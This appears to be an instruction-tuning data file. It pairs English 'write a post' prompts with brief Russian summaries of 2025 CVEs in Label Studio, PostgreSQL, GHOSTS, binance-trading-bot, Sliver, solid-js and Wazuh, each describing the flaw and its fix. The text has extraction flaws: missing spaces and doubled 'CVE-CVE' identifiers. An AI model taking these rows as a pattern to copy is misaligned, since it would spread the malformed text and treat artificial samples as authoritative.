| Write a post on the following topic,Server-Side Request Forgery (SSRF) vulnerability in Label Studio,"CVE-CVE-2025-25297 , выявленная вLabel Studio в версиях до 1.16.0, приводит кServer-Side Request Forgery (SSRF). Уязвимость заключалась в попаданием пользовательских значений в параметрs3_endpointбез предварительной проверки (см.source code), что давало возможность злоумышленнику заставить приложение отправлять HTTP-запросы произвольным внутренним службам. Висправлениибыл добавлен декораторcatch_and_reraise_from_none, который проверяет переданный домен по ""белому"" списку доверенныхS3доменов." |
| Write a post on the following topic,SQL Injection Vulnerability in PostgreSQL,"CVE-CVE-2025-1094 , обнаруженная вPostgreSQL в версиях до 17.3, 16.7, 15.11, 14.16 и 13.19, приводит кSQL Injection. Уязвимость связана с некорректной нейтрализацией кавычек, что открывает возможность для злоумышленника эксплуатировать SQL-инъекции, а также передавать команды быстрого доступа с помощью\!, которые могут привести к выполнению команды оболочки. Информация об уязвимости и уязвимых версиях находится вSecurity Advisory." |
| Write a post on the following topic,Path Traversal уязвимость в GHOSTS до версии 8.2.7.9,"CVE-CVE-2025-27092 , выявленная вGHOSTS в версиях до8.2.7.9, приводит кPath Traversal. Проблема заключалась в попадании пользовательских данных без предварительной проверки в параметрphotoLinkв/api/npcs/{id}/photo(см.source code), что позволяло злоумышленнику получить доступ к произвольным файлам. Висправлениибыла добавлена функцияIsPathWithinAppScope(), которая преобразует путь в абсолютный и проверяет находится ли переданный путь в пределах допустимых папок, также была добавлена проверка, что файл имеет допустимое расширение изображений (.jpg, .jpeg, .png)." |
| Write a post on the following topic,OS Command Injection в binance-trading-bot,"CVE-CVE-2025-27106 , выявленная вbinance-trading-bot в версиях до 0.0.100, приводит кOS Command Injection. Проблема заключалась в попадании имени файла напрямую вshell.exec()через эндпоинт/restore(см.source code), что позволяло любому авторизованному пользователю выполнить код на хосте. Висправлениифункцияshell.exec()была заменена на безопасную версиюexecFile(), в которую аргументы стали передаваться массивом." |
| Write a post on the following topic,Уязвимость SSRF в Sliver до версии 1.5.43,"CVE-CVE-2025-27090 , выявленная вSliver в версиях до 1.5.43, приводит кServer-Side Request Forgery (SSRF). Уязвимость заключалась в возможности открытия обратного туннеля со стороны тестируемой машины без отправки оператором такой команды (см.source code), что могло привести к раскрытию IP-адреса оператора третьей стороне и открывало его машину для слепой инъекции SSRF. Висправлениибыл добавлен механизм проверки и валидации сессий перед созданием обратного туннеля, предотвращая возможность несанкционированного подключения." |
| Write a post on the following topic,Cross-Site Scripting (XSS) vulnerability in solid-js due to improper handling of user input in JSX fragments,"CVE-CVE-2025-27109 , выявленная вsolid-js в версиях до 1.9.4, приводит кCross-Site Scripting (XSS). Уязвимость возникала из-за неправильной обработки пользовательского ввода в JSX-фрагментах (см.source code), что могло привести к выполнению вредоносного JavaScript кода. Висправлениибыла добавлена функцияescape(), которая санитизирует специальные HTML-символы в строке, заменяя специальные символы на их мнемоники" |
| Write a post on the following topic,CVE-2025-24016: Remote Code Execution in Wazuh through Unsafe Deserialization,"CVE-CVE-2025-24016 , обнаруженная вWazuh в версиях с 4.4.0 до 4.9.1, приводит кRemote Code Execution (RCE). Уязвимость возникала из-за небезопасного процесса десериализации параметровDistributedAPIс помощью методаas_wazuh_object(), который приводил к вызову необработанного исключения и выполнению произвольного кода, если злоумышленнику удавалось внедрить несанкционированный словарь в запрос или ответ. Информация об уязвимости, рекомендациях по обновлению и уязвимых версиях находится вSecurity Advisory." |
| |